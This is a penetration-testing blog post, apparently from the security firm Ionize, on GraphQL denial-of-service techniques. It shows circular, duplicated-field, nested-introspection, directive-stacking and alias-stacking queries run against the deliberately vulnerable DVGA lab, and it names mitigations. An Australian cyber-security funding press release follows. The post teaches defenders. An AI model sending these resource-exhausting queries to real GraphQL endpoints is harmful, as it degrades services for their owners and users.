This does not technically break any rules of the way GraphQL was designed, and the API dev has not done anything wrong with his implementation for this to occur. It requires third party frameworks such as GraphQL Shield to be installed to mitigate, because according to GraphQL, it is simply working by design in this instance.

GraphQL Recursive relationships

Using tools such as GraphQL voyager, we are able to visualise relationships between objects in a schema.

This is a good tool for identifying recursive relationships; an indication that the developers have an issue with their business logic. Unlike circular fragments, these are not specification vulnerabilities, these are flaws introduced by the developers.

We can see that paste and pastes from the OwnerObject both reference PasteObject, whilst owner references OwnerObject.

Using this information, if we make a circular request like so:
query{
pastes{
owner{name}
}
}

This will return in a normal amount of time for a request, as we aren’t really doing anything wrong yet. If this query were to be stacked however, which is a perfectly valid thing to do since both objects reference one another and we can craft it to continue passing thew query back and forth, with twenty stacked queries.

This now takes over a second. Doubling it again, to be 40 stacked queries, and it takes over 5 minutes to get a response. In fact it took so long that I killed the request, because the entire instance had become unusable. Pure service degradation, from a single query!

Field Duplication

This is a similar execution abusing recursive queries, but instead of relying on the existence of bidirectional fields, which may not always be present, we simply put the same field from a valid query multiple times. And by multiple, i mean an extreme number of times.

A normal query for all pastes with their title and the contents of the pastes returns in 64ms from this screenshot.

But if I duplicate the content field one thousand times, it takes almost a full second.

And if I were to add it in 5,000 times, it takes over 13 seconds.

Unless the developer has implemented query cost analysis, this is a technique that is unescapable for GraphQL. Nothing about this defies the GraphQL specification and is seen as a perfectly valid query to the server. Without an appliance that will determine how costly a request will be prior to processing, rate limiting and traditional security mechanisms cannot prevent this type of attack.

As a real-world example, in 2019 GitLab discovered they themselves were vulnerable to this type of attack. https://gitlab.com/gitlab-org/gitlab/-/issues/30096

Introspection

Introspection is also vulnerable to circular issues, right out the gate anywhere its enabled. As penetration testers, it is also good to note that the presence of introspection is also a finding in and of itself.

Inside the __schema, we can request the types. This takes fields as an input, which can be given type as an input, which can be given fields as an input, which can be given type as an input and so on and so forth. This is a small proof of concept of that concept:

query {
__schema {
types {
fields {
type {
fields {
type {
fields {
name
}
}
}
}
}
}
}
}

To visualise what is happening here, lets send a normal query that is not trying to cause harm.

This returns in a normal amount of time, as it is a normal query.

What if I were to double the number of introspections?

We can see that it takes three times as long to do twice as much work. Something is certainly a bit wobbly here, and we can absolutely abuse this some more.

By sending a request with approximately twenty introspections, this now takes almost three seconds. We have absolutely proven service degradation can be caused with a single query.

Like circular fragments, this type of attack is GraphQL specification cimpliant. We are doing nothing here except (ab)using introspection in the way it was made. This is a very good reason why developers should disable introspection on all public GraphQL endpoints, because leaving it turned on allows this to occur.

Directive Stacking

As part of the GraphQL specification, there is no limit to the number of directives that can be applied to a field. The server also must process all directives given to it, in order to determine what is a real or fictitious directive. This means that what we send for the server to process is inconsequential, it will still be processed and we are still submitting perfectly valid queries that wont trigger any WAFs.

As shown below I am sending approximately 100 fake directives to the endpoint, which takes almost 5 seconds to respond.

Adding 40,000 fake directives now makes responses return in over 50 seconds.

Whilst this is a 400, because the directive is not real, this is not an improperly formatted request as a 400 would otherwise indicate from a REST API; this query is strictly obeying all rules of the specification. The fact we were able to adjust the response time by a measurable time says this is a valid denial of service vector, despite being 400 responses.

Stacking queries with aliases

This is the last example, and it is a little funny. Before we get into it is important to know that the systemUpdate function on DVGA is designed to run for a random amount of time. So you may find your response times dont line up with the screenshots, at all. But if you do the experiments you will find that this vector does infact work.

A series of stacked system updates takes 50 seconds in this screenshot. While this looks concerning, this is in fact in line with what that particular DVGA function does if it was run a single time.

30 seconds for a single query and 50 seconds for a stacked query must mean that it is infact processing multiple times, but this is still in line with the variances that that function can give.

If we were to stack the queries with aliases however, like so:

We can see if is taking almost 4 minutes to process. This, is not expected behaviour from the function, and is indictive that we have been able to cause service degradation by causing functions to trigger multiple times within a single query.

In summmary

Hopefully this has been an illuminating article and gives some insight into the varied ways denial of service and service degradation can be caused without utilising high volumes of traffic against a GraphQL endpoint.

Stay Up to Date

Latest News

$6.4 Project DFNDR awarded federal funding as a Cooperative Research Centres Project

WEDNESDAY 13 MARCH 2024, CANBERRA ACT: Canberra-based cyber security company, Ionize, has been awarded a Federal Government Grant through the Cooperative Research Centres Projects (CRC-P) Round 15 opportunity to deliver Project DFNDR: Adaptive Cyber Security for Defence and Critical Infrastructure SMEs.

Project DFNDR will be delivered in partnership between Ionize, Cybermerc and the University of Canberra through a groundbreaking initiative dedicated to streamlining cyber threat detection, network defence, response and recovery for small to medium enterprises (SME). Project DFNDR will provide a quantifiable uplift to participating SMEs, through an integrated managed cyber security service and threat intelligence sharing platform.

With federal funding awarded through the Cooperative Research Centres Project, Andrew Muller CEO of Ionize sees Project DFNDR as tangible evidence of a partnership and solution approach within the cyber security industry. “Technological advancement and innovation cannot occur without strong partnerships across private enterprise, research institutions and government. For Australia to continue to be at the forefront of global innovation in cyber security, we need to collaborate across our industry and importantly with academia; advancing technological solutions is driven by data, analysis and lessons learned”.

A key element of Project DFNDR is an integrated managed security service with cyber threat intelligence sharing, delivering proactive and adaptive cyber defences. This creates a simple and effective measure to understand the cyber threat environment for an organisation. Matthew Nevin, CEO of Cybermerc encounters “the numerous security challenges faced by organisations every day. Project DFNDR aims to simplify and strengthen SMEs cyber security by providing a complete service across threat hunting, monitoring and intelligence to mitigate cyber attacks and share information on Advanced Persistent Threats.”

The rapid adoption of technology and its increasing use across all levels of personal and professional domains has undoubtedly expanded the surface for attacks. Dr Abu Barkat Ullah, Associate Professor Information Technology and Systems at the University of Canberra knows that “the ability to predict, prevent and identify cyber threats attempting to exploit networks is a valuable resource and academia and research have crucial roles to play in attaining this. Through our analysis and research of the telemetry provided by companies participating in Project DFNDR, researchers will have access to a significant data lake to support the development of an adaptive cyber security solution.”

Prioritisation for participation in the project will be given to companies operating within or delivering services to defence and critical infrastructure industries. As part of the project, companies that choose to participate will incur no costs during proof of concept, expected to take between 12 – 15 months.
The objective of the CRC-P program is to:
• improve the competitiveness, productivity and sustainability of Australian industries, especially where Australia has a competitive strength, and in alignment with government priorities;
• foster high quality research to solve industry-identified problems through an industry-led and outcome-focused collaborative research partnerships, especially involving research organisations
• encourage and facilitate small and medium enterprise (SME) participation in collaborative research.

Media Enquiries

E: ProjectDFNDR@ionize.com.au

About Ionize

Ionize was founded in 2008 with the simple belief that every organisation should be able to take their business into the digital realm with the confidence that their customers, employees and partners will have a secure experience.

For this belief to be realised we recognised that cyber security needed to move beyond annual security reviews and instead focus on building a full-spectrum security capability that delivers continuous business and security alignment – from governance & compliance through attack simulations through to remediation and engineering services.

We also understand that building and maintaining your own cyber security capability is hard – which is why we established Ionize HAWC Managed Cyber Security Services – including SOCaaS, CISOaaS and continuous, automated penetration testing services.

About Cybermerc

Cybermerc is an Australian company founded in 2016 by two brothers on a mission to forge a collective cyber defence for Australia and its partners, powered by a community of businesses, academia and government.

Cybermerc connects businesses together in a defensive collaboration against shared cyber threats specialising in:
• cyber security detection and protection for SMBs
• national Cyber Threat Intelligence Sharing Platform for government agencies
• Cyber Threat Assessments of organisations and
• cyber security and threat intelligence training to elevate organisational capability

About University of Canberra

The University of Canberra (UC) has its main campus located in Bruce, Canberra in the Australian Capital Territory. As a civic university in Australia’s capital, we work with government, business and industry to serve our community, region and nation, challenging the status quo in pursuit of innovative and high quality teaching, learning and research impact.

Located within the Faculty of Science and Technology, the School of Information Technology & Systems (IT&S) is at the forefront of Information Technology, Information Systems and Engineering. We ensure students are ready to enter the world’s most in-demand industries, with cutting edge specialisations designed in consultation with some of the world’s leading IT and engineering organisations. Our academic staff are renowned and respected educators, researchers and industry leaders, committed to sharing knowledge, skills, experience and professional connections. They provide graduates with learning experiences that reflect industry advancements and trends, as they hone their technical skillset in real world environments.

Stay Up to Date

Latest News